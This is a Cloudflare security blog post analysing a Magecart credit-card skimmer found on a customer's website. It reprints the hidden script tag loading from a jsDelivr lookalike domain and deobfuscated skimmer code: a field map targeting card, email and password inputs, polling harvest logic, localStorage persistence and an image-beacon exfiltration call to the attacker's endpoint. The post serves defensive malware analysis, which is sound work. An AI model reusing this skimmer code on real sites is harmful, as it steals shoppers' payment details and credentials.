Post Syndicated from Himanshu Anand original https://blog.cloudflare.com/navigating-the-maze-of-magecart



The Cloudflare security research team reviews and evaluates scripts flagged by Cloudflare Page Shield, focusing particularly on those with low scores according to our machine learning (ML) model, as low scores indicate the model thinks they are malicious. It was during one of these routine reviews that we stumbled upon a peculiar script on a customer’s website, one that was being fetched from a zone unfamiliar to us, a new and uncharted territory in our digital map.

This script was not only obfuscated but also exhibited suspicious behavior, setting off alarm bells within our team. Its complexity and mysterious nature piqued our curiosity, so we decided to dig deeper and work out what the script was really doing.

In our quest to decipher the script’s purpose, we geared up to dissect its layers, determined to shed light on its hidden intentions and understand the full scope of its actions.

The Infection Mechanism: A seemingly harmless HTML div element housed a piece of JavaScript, a trojan horse lying in wait.

<div style="display: none; visibility: hidden;">

<script src="//cdn.jsdelivr.at/js/sidebar.min.js"></script>

</div>

The devil in the details

The script hosted at the aforementioned domain was a piece of obfuscated JavaScript, a common tactic used by attackers to hide their malicious intent from casual observation. The obfuscated code can be examined in detail through the snapshot provided by Cloudflare Radar URL Scanner.

Obfuscated script snippet:

function _0x5383(_0x411252,_0x2f6ba1){var _0x1d211f=_0x1d21();return _0x5383=function(_0x5383da,_0x5719da){_0x5383da=_0x5383da-0x101;var _0x3d97e9=_0x1d211f[_0x5383da];return _0x3d97e9;},_0x5383(_0x411252,_0x2f6ba1);}var _0x11e3ed=_0x5383;(function(_0x3920b4,_0x32875c){var _0x3147a9=_0x5383,_0x5c373e=_0x3920b4();while(!![]){try{var _0x5e0fb6=-parseInt(_0x3147a9(0x13e))/0x1*(parseInt(_0x3147a9(0x151))/0x2)+parseInt(_0x3147a9(0x168))/0x3*(parseInt(_0x3147a9(0x136))/0x4)+parseInt(_0x3147a9(0x15d))/0x5*(parseInt(_0x3147a9(0x152))/0x6)+-parseInt(_0x3147a9(0x169))/0x7*(-parseInt(_0x3147a9(0x142))/0x8)+parseInt(_0x3147a9(0x143))/0x9+-parseInt(_0x3147a9(0x14b))/0xa+-parseInt(_0x3147a9(0x150))/0xb;if(_0x5e0fb6===_0x32875c)break;else _0x5c373e['push'](_0x5c373e['shift']());}catch(_0x1f0719){_0x5c373e['push'](_0x5c373e['shift']());}}}(_0x1d21,0xbc05c));function _0x1d21(){var _0x443323=['3439548foOmOf',

.....
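
The snippet follows a pattern common to JavaScript obfuscators: string literals are moved into an array, every reference becomes a lookup with an offset (here `0x101`), and the array is rotated with `push(shift())` until a checksum computed from its contents matches a constant (here `0xbc05c`). The toy below is a minimal sketch of that pattern, not the attackers' code. The strings, the target value `7`, and the names `lookup` and `strings` are invented for illustration.

```javascript
// Toy model of the string-array pattern; all values here are hypothetical.
const OFFSET = 0x101; // same offset the real decoder subtracts
const TARGET = 7;     // stand-in for the real checksum constant 0xbc05c
const strings = ["createElement", "7src", "IMG"]; // shipped in rotated order

// Every string reference in the obfuscated body becomes lookup(0x1xx).
function lookup(index) {
  return strings[index - OFFSET];
}

// Rotate the array until the value derived from its contents matches.
while (parseInt(lookup(0x101), 10) !== TARGET) {
  strings.push(strings.shift());
}

console.log(lookup(0x102)); // "IMG"
console.log(lookup(0x103)); // "createElement"
```

Until the rotation has run, the indices point at the wrong strings, which is why simply reading the array in source order tells an analyst very little.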

The primary objective of this script was to steal Personally Identifiable Information (PII), including credit card details. The stolen data was then transmitted to a server controlled by the attackers, located at https://jsdelivr[.]at/f[.]php.

Decoding the malicious domain

Before diving into a script’s exact behavior, it is worth examining the domain that hosts it, since the domain alone can provide valuable evidence for the overall evaluation. The domain hosting this script, cdn.jsdelivr.at, stands out in several ways:

- It was registered on 2022-04-14.

- It impersonates the well-known hosting service jsDelivr, which is hosted at cdn.jsdelivr.net.

- It was registered by 1337team Limited, a company known for providing bulletproof hosting services. These services are frequently utilized in various cybercrime campaigns due to their resilience against law enforcement actions and their ability to host illicit activities without interruption.

- Previous mentions of this hosting provider, such as in a tweet by @malwrhunterteam, highlight its involvement in cybercrime activities. This further emphasizes the reputation of 1337team Limited in the cybercriminal community and its role in facilitating malicious campaigns.
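
The impersonation in the list above (cdn.jsdelivr.at versus cdn.jsdelivr.net) is a top-level-domain swap, which is simple to flag automatically. The following is a rough sketch of such a check, not a description of how Page Shield works. The function name `isTldLookalike` and the allowlist are assumptions, and the heuristic only handles single-label TLDs.

```javascript
// Naive lookalike check: same labels as a trusted host, different TLD.
// Assumption: single-label TLDs only; suffixes such as "co.uk" would
// need a public suffix list to be handled correctly.
function isTldLookalike(hostname, trustedHosts) {
  const candidate = hostname.toLowerCase();
  const stem = candidate.split(".").slice(0, -1).join(".");
  return trustedHosts.some((trustedHost) => {
    const trusted = trustedHost.toLowerCase();
    const trustedStem = trusted.split(".").slice(0, -1).join(".");
    return stem === trustedStem && candidate !== trusted;
  });
}

const allowlist = ["cdn.jsdelivr.net"]; // hypothetical list of expected script hosts
console.log(isTldLookalike("cdn.jsdelivr.at", allowlist));  // true
console.log(isTldLookalike("cdn.jsdelivr.net", allowlist)); // false
```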

Decoding the malicious script

Data Encoding and Decoding Functions: The script uses two functions, wvnso.jzzys and wvnso.cvdqe, for encoding and decoding data. They employ Base64 and URL encoding techniques, common methods in malware to conceal the real nature of the data being sent.

var wvnso = {

"jzzys": function (_0x5f38f3) {

return btoa(encodeURIComponent(_0x5f38f3).replace(/%([0-9A-F]{2})/g, function (_0x7e416, _0x1cf8ee) {

return String.fromCharCode('0x' + _0x1cf8ee);

}));

},

"cvdqe": function (_0x4fdcee) {

return decodeURIComponent(Array.prototype.map.call(atob(_0x4fdcee), function (_0x273fb1) {

return '%' + ('00' + _0x273fb1.charCodeAt(0x0).toString(0x10)).slice(-0x2);

}).join(''));

}
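
For readability, the two helpers can be rewritten with descriptive names. This is a sketch of equivalent behavior, with names chosen by us rather than taken from the script. The `encodeURIComponent` detour exists because `btoa` only accepts characters in the Latin-1 range, so the text is first turned into its UTF-8 bytes.

```javascript
// Readable equivalents of jzzys and cvdqe (function names are ours).
function encodeUtf8Base64(text) {
  // Percent-encode, then turn each %XX escape back into a single byte character.
  const utf8Bytes = encodeURIComponent(text).replace(
    /%([0-9A-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16))
  );
  return btoa(utf8Bytes);
}

function decodeUtf8Base64(encoded) {
  // Reverse the process: bytes back to %XX escapes, then decode as UTF-8.
  const percentEncoded = Array.from(
    atob(encoded),
    (ch) => "%" + ch.charCodeAt(0).toString(16).padStart(2, "0")
  ).join("");
  return decodeURIComponent(percentEncoded);
}

const sample = JSON.stringify({ Holder: "José Núñez" });
const encoded = encodeUtf8Base64(sample);
console.log(decodeUtf8Base64(encoded) === sample); // true
```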

Targeted Data Fields: The script is designed to identify and monitor specific input fields on the website. These fields include sensitive information like credit card numbers, names, email addresses, and other personal details. The wvnso.cwwez property holds the map of these fields, stored as a Base64-encoded JSON array, and shows that the attackers had carefully studied the website’s layout.
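
The field map is stored as a Base64 blob, shown in full right after this sketch. Decoding just its first 52 characters is enough to see the shape of one entry. The variable names given to the five positions are our interpretation of how the harvesting function uses them, and `readMode` in particular is a guess because the function that consumes it is not shown.

```javascript
// First 52 characters of the blob (13 complete 4-character Base64 groups).
const prefix = "W1siZmllbGQiLCAiaWZyYW1lIiwgMCwgIm4iLCAiTnVtYmVyIl0s";
const text = atob(prefix); // '[["field", "iframe", 0, "n", "Number"],'

// Drop the trailing comma and close the outer array so the fragment parses.
const [firstEntry] = JSON.parse(text.slice(0, -1) + "]");

// Position names are assumptions based on how the script indexes each entry.
const [attribute, expectedValue, readMode, shortCode, outputKey] = firstEntry;
console.log({ attribute, expectedValue, readMode, shortCode, outputKey });
```

Read this way, the entry says: look for an element whose `field` attribute equals `iframe`, and store what it contains under the key `Number`.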

"cwwez": window.JSON.parse(wvnso.cvdqe("W1siZmllbGQiLCAiaWZyYW1lIiwgMCwgIm4iLCAiTnVtYmVyIl0sIFsibmFtZSIsICJmaXJzdG5hbWUiLCAwLCAiZiIsICJIb2xkZXIiXSwgWyJuYW1lIiwgImxhc3RuYW1lIiwgMCwgImwiLCAiSG9sZGVyIl0sIFsiZmllbGQiLCAiaWZyYW1lIiwgMCwgImUiLCAiRGF0ZSJdLCBbImZpZWxkIiwgImlmcmFtZSIsIDAsICJjIiwgIkNWViJdLCBbImlkIiwgImN1c3RvbWVyLWVtYWlsIiwgMCwgImVsIiwgImVtYWlsIl0sIFsibmFtZSIsICJ0ZWxlcGhvbmUiLCAwLCAicGUiLCAicGhvbmUiXSwgWyJuYW1lIiwgImNpdHkiLCAwLCAiY3kiLCAiY2l0eSJdLCBbIm5hbWUiLCAicmVnaW9uX2lkIiwgMywgInNlIiwgInN0YXRlIl0sIFsibmFtZSIsICJyZWdpb24iLCAwLCAic2UiLCAic3RhdGUiXSwgWyJuYW1lIiwgImNvdW50cnlfaWQiLCAwLCAiY3QiLCAiQ291bnRyeSJdLCBbIm5hbWUiLCAicG9zdGNvZGUiLCAwLCAienAiLCAiWmlwIl0sIFsiaWQiLCAiY3VzdG9tZXItcGFzc3dvcmQiLCAwLCAicGQiLCAicGFzc3dvcmQiXSwgWyJuYW1lIiwgWyJzdHJlZXRbMF0iLCAic3RyZWV0WzFdIiwgInN0cmVldFsyXSJdLCAwLCAiYXMiLCAiYWRkciJdXQ==")),

Data Harvesting Logic: The script uses a set of complex functions (wvnso.uvesz, wvnso.wsrmf, etc.) to check each targeted field for user input. When it finds the data it wants (like credit card details), it collects (“harvests”) this data and prepares it to be sent out (“exfiltrated”).
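
The obfuscated function that follows is easier to read with a simplified rendering in mind. The sketch below is our own reduction, not the attackers' code: elements are modeled as plain objects so it runs outside a browser, only three map entries are included, and the multi-field branch and the `'y'` branch are left out. The names `harvest`, `fieldMap`, and `collected` are hypothetical.

```javascript
// Simplified model of the matching loop; names and data shapes are ours.
const fieldMap = [
  ["name", "firstname", 0, "f", "Holder"],
  ["name", "lastname", 0, "l", "Holder"],
  ["id", "customer-email", 0, "el", "email"],
];

function harvest(element, collected) {
  for (const [attr, expected, , shortCode, outputKey] of fieldMap) {
    // Skip entries whose attribute is missing, mismatched, or has no input yet.
    if (!(attr in element.attributes)) continue;
    if (element.attributes[attr] !== expected || element.value.length === 0) continue;
    if (shortCode === "l") {
      // Last name is appended to the first name under the same key.
      collected[outputKey] += " " + element.value;
    } else {
      collected[outputKey] = element.value;
    }
  }
  return collected;
}

const collected = { Holder: "" };
harvest({ attributes: { name: "firstname" }, value: "Ada" }, collected);
harvest({ attributes: { name: "lastname" }, value: "Lovelace" }, collected);
console.log(collected.Holder); // "Ada Lovelace"
```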

"uvesz": function (_0x52b255) {

for (var _0x356fbe = 0x0; _0x356fbe < wvnso.cwwez.length; _0x356fbe++) {

var _0x25348a = wvnso.cwwez[_0x356fbe];

if (_0x52b255.hasAttribute(_0x25348a[0x0])) {

if (typeof _0x25348a[0x1] == "object") {

var _0xca9068 = '';

_0x25348a[0x1].forEach(function (_0x450919) {

var _0x907175 = document.querySelector('[' + _0x25348a[0x0] + "=\"" + _0x450919 + "\"" + ']');

if (_0x907175 != null && wvnso.wsrmf(_0x907175, _0x25348a[0x2]).length > 0x0) {

_0xca9068 += wvnso.wsrmf(_0x907175, _0x25348a[0x2]) + " ";

}

});

wvnso.krwon[_0x25348a[0x4]] = _0xca9068.trim();

} else {

if (_0x52b255.attributes[_0x25348a[0x0]].value == _0x25348a[0x1] && wvnso.wsrmf(_0x52b255, _0x25348a[0x2]).length > 0x0) {

if (_0x25348a[0x3] == 'l') {

wvnso.krwon[_0x25348a[0x4]] += " " + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);

} else {

if (_0x25348a[0x3] == 'y') {

wvnso.krwon[_0x25348a[0x4]] += '/' + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);

} else {

wvnso.krwon[_0x25348a[0x4]] = wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);

}

}

}

}

}

}

}

Stealthy Data Exfiltration: After harvesting the data, the script quietly sends it to the attacker’s server (located at https://jsdelivr[.]at/f[.]php). This is done in a way that mimics normal Internet traffic, making it hard to detect. The script programmatically creates an Image HTML element (never displayed to the user) and sets its src attribute to the attacker’s URL, with the encoded data appended as a hash query parameter. The browser’s request for that “image” is what delivers the stolen data.
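
To make the beacon format concrete, here is a hedged sketch of how such a URL is assembled and how an analyst could decode one found in proxy or browser logs. The host `attacker.example` and the function names are placeholders of ours. The query string is split by hand because the script does not URL-encode the Base64 text, and standard query parsers would turn any `+` in it into a space.

```javascript
// UTF-8 safe Base64 helpers equivalent to the script's jzzys / cvdqe.
const encode = (text) =>
  btoa(encodeURIComponent(text).replace(/%([0-9A-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))));
const decode = (b64) =>
  decodeURIComponent(Array.from(atob(b64), (ch) =>
    "%" + ch.charCodeAt(0).toString(16).padStart(2, "0")).join(""));

// What the skimmer does: endpoint + "?hash=" + Base64(JSON of harvested data).
function buildBeaconUrl(endpoint, harvested) {
  return endpoint + "?hash=" + encode(JSON.stringify(harvested));
}

// What an analyst can do with a logged URL: recover the harvested object.
function decodeBeaconUrl(url) {
  const marker = "?hash=";
  const raw = url.slice(url.indexOf(marker) + marker.length);
  return JSON.parse(decode(raw));
}

const beacon = buildBeaconUrl("https://attacker.example/f.php", {
  email: "user@example.com",
});
console.log(decodeBeaconUrl(beacon)); // { email: 'user@example.com' }
```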

"eubtc": function () {

var _0x4b786d = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));

if (wvnso.pqemy() && !(wvnso.rnhok.indexOf(_0x4b786d) != -0x1)) {

wvnso.rnhok.push(_0x4b786d);

var _0x49c81a = wvnso.spyed.createElement("IMG");

_0x49c81a.src = wvnso.cvdqe("aHR0cHM6Ly9qc2RlbGl2ci5hdC9mLnBocA==") + '?hash=' + _0x4b786d;

}

}

Persistent Monitoring: The script keeps a constant watch on user input. This means that any data entered into the targeted fields is captured, not just when the page first loads, but continuously as long as the user is on the page.

Execution Interval: The script runs its data-collecting routine every 500 milliseconds (0x1f4 in hexadecimal), as shown by the window.setInterval(wvnso.bumdr, 0x1f4) call. This ensures that it constantly checks for new user input on the site.

window.setInterval(wvnso.bumdr, 0x1f4);
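
Polling twice per second would flood the attacker's server if every tick sent a request, which is presumably why eubtc first checks wvnso.rnhok for the encoded payload. The sketch below illustrates that interplay under our own names (`shouldSend`, `alreadySent`, `tick`). The additional wvnso.pqemy() gate is omitted because its body is not shown.

```javascript
const POLL_INTERVAL_MS = 0x1f4; // hexadecimal for 500
const alreadySent = [];         // plays the role of wvnso.rnhok

// Returns true only when the payload is new, mirroring the indexOf check in eubtc.
function shouldSend(encodedPayload) {
  if (alreadySent.indexOf(encodedPayload) !== -1) return false;
  alreadySent.push(encodedPayload);
  return true;
}

console.log(POLL_INTERVAL_MS);           // 500
console.log(shouldSend("cGF5bG9hZA==")); // true: first time this payload is seen
console.log(shouldSend("cGF5bG9hZA==")); // false: form unchanged, nothing re-sent

// In a browser, a hypothetical tick function would be scheduled as:
// setInterval(tick, POLL_INTERVAL_MS);
```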

Local Data Storage: Interestingly, the script uses local storage methods (wvnso.hajfd, wvnso.ijltb) to keep the collected data on the user’s device. This could be a way to prevent data loss in case there are issues with the Internet connection or to gather more data before sending it to the server.
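
A minimal sketch of this save-and-restore cycle follows. It uses an in-memory stand-in for localStorage so that it runs outside a browser, plain `btoa`/`atob` instead of the script's UTF-8 safe helpers, and names of our own (`saveState`, `restoreState`, `fakeStorage`). The two-page scenario in the comments is an assumption about why the attackers might want persistence, not something the script states.

```javascript
// In-memory stand-in for window.localStorage (hypothetical helper).
const fakeStorage = {
  items: new Map(),
  setItem(key, value) { this.items.set(key, String(value)); },
  getItem(key) { return this.items.has(key) ? this.items.get(key) : null; },
};
const STORAGE_KEY = "oybwd"; // key name taken from the script

function saveState(state) {
  fakeStorage.setItem(STORAGE_KEY, btoa(JSON.stringify(state)));
}

function restoreState() {
  const stored = fakeStorage.getItem(STORAGE_KEY);
  return stored === null ? {} : JSON.parse(atob(stored));
}

saveState({ email: "user@example.com" }); // e.g. captured on one page
const restored = restoreState();          // e.g. reloaded on a later page
console.log(restored.email);              // "user@example.com"
```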

"ijltb": function () {

var _0x19c563 = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));

window.localStorage.setItem("oybwd", _0x19c563);

},

"hajfd": function () {

var _0x1318e0 = window.localStorage.getItem("oybwd");

if (_0x1318e0 !== null) {

wvnso.krwon = window.JSON.parse(wvnso.cvdqe(_0x1318e0));

}

}

This JavaScript code is a sophisticated tool for stealing sensitive information from users. It’s well-crafted to avoid detection, gather detailed information, and transmit it discreetly to a remote server controlled by the attackers.

Proactive detection

Page Shield’s existing machine learning algorithm is capable of automatically detecting malicious JavaScript code. As cybercriminals evolve their attack methods, we are constantly improving our detection and defense mechanisms. An upcoming version of our ML model, an artificial neural network, has been designed to maintain high recall (i.e., identifying the many different types of malicious scripts) while also providing a low false positive rate (i.e., reducing false alerts for benign code). The new version of Page Shield’s ML automatically flagged the above script as a Magecart-type attack with a very high probability. In other words, our ML correctly identified a novel attack script operating in the wild! Cloudflare customers with Page Shield enabled will soon be able to take further advantage of our latest ML model’s superior protection for client-side security. Stay tuned for more details.

What you can do

The attack on a Cloudflare customer is a sobering example of the Magecart threat. It underscores the need for constant vigilance and robust client-side security measures for websites, especially those handling sensitive user data. This incident is a reminder that cybersecurity is not just about protecting data but also about safeguarding the trust and well-being of users.

We recommend the following actions to enhance security and protect against similar threats. Our comprehensive security model includes several products specifically designed to safeguard web applications and sensitive data:



- Implement the WAF Managed Rules product: This solution offers robust protection against known attacks by monitoring and filtering HTTP traffic between a web application and the Internet. It effectively guards against common web exploits.



- Deploy ML-Based WAF Attack Score: Our ML-based WAF, known as Attack Score, is specifically engineered to defend against previously unknown attacks. It uses advanced machine learning algorithms to analyze web traffic patterns and identify potential threats, providing an additional layer of security against sophisticated and emerging threats.

- Use Page Shield: Page Shield is designed to protect against Magecart-style attacks and browser supply chain threats. It monitors and secures third-party scripts running on your website, helping you identify malicious activity and proactively prevent client-side attacks, such as theft of sensitive customer data. This tool is crucial for preventing data breaches originating from compromised third-party vendors or scripts running in the browser.

- Activate Sensitive Data Detection (SDD): SDD alerts you if certain sensitive data is being exfiltrated from your website, whether due to an attack or a configuration error. This feature is essential for maintaining compliance with data protection regulations and for promptly addressing any unauthorized data leakage.
